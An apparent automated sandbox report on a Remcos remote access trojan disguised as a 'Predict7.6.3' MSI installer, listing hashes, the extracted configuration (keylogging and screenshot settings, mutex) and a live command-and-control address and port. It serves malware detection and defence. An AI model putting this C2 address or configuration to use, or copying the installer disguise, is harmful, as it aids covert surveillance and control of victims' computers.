Overview

overview

10

Static

static

1

Predict7.6....6.msi

windows7-x64

6

Predict7.6....6.msi

windows10-2004-x64

10

Resubmissions

16-10-2024 08:03

241016-jxqefszhpg 10

16-10-2024 07:59

241016-jvwtfszgrg 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Predict7.6.3.zip

  • Size

    39.8MB

  • Sample

    241016-jvwtfszgrg

  • MD5

    1ce6625f0b9a60f382b9534ba41405bc

  • SHA1

    e3c7d2da84736d121a6109ca8b139957b7a1c409

  • SHA256

    2bf994daf30eb46bfbf9f43028717c14e4693a7afb4a5c2bb7b6d852daed2b86

  • SHA512

    6f0b33b5a9f7875f659c50eb962c5c1f29fd2dee615197f63dbca8c82c14e0df6a2d0f23c8419f12842ffe1d09e6b394b6bc2de5007902a16825f895324bee51

  • SSDEEP

    786432:GxucXLnn0SjhGKhGjDbJ8LB5VeOaaeUcBoGhsV0J4IdK62IOlW35efx3:y0StEJGB5ZegssV9OK62E5efx3

Score
10/10
remcosnewinchdiscoveryexecutionpersistenceprivilege_escalationrat

Malware Config

Extracted

Family

remcos

Botnet

NEWINCH

C2

185.157.162.103:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Gameprot-LPTFIG

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Targets

    • Target

      Predict7.6.3/Launcher8.3.6.msi

    • Size

      34.8MB

    • MD5

      62a70b6a607c787a26ecd7aae7f5cfa7

    • SHA1

      24be3506a7eb8bcddd63810813934138902a07d1

    • SHA256

      975bcef0f45e9012fd3d1e06133d916eec9a77bfe40bf4d526711a40ff956dfb

    • SHA512

      d18514bae872ce947a05551485d377a3d8de1f807aa9c486496cdef455f09f71b16967b62a24e95d5c62217d63c63939337f66023815b35a0fbd9e87b2c6a18a

    • SSDEEP

      786432:Fx7ZJrqPhKmBwZDjzQrdj1CqeqaGK3Eafgtil2EJGw0SEx:7rqt6zKdj3auMgtTyGw0

    Score
    10/10
    discoverypersistenceprivilege_escalationremcosnewinchexecutionrat

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

      ratremcos

    • Use of msiexec (install) with remote resource

    • Blocklisted process makes network request

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.

      execution

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks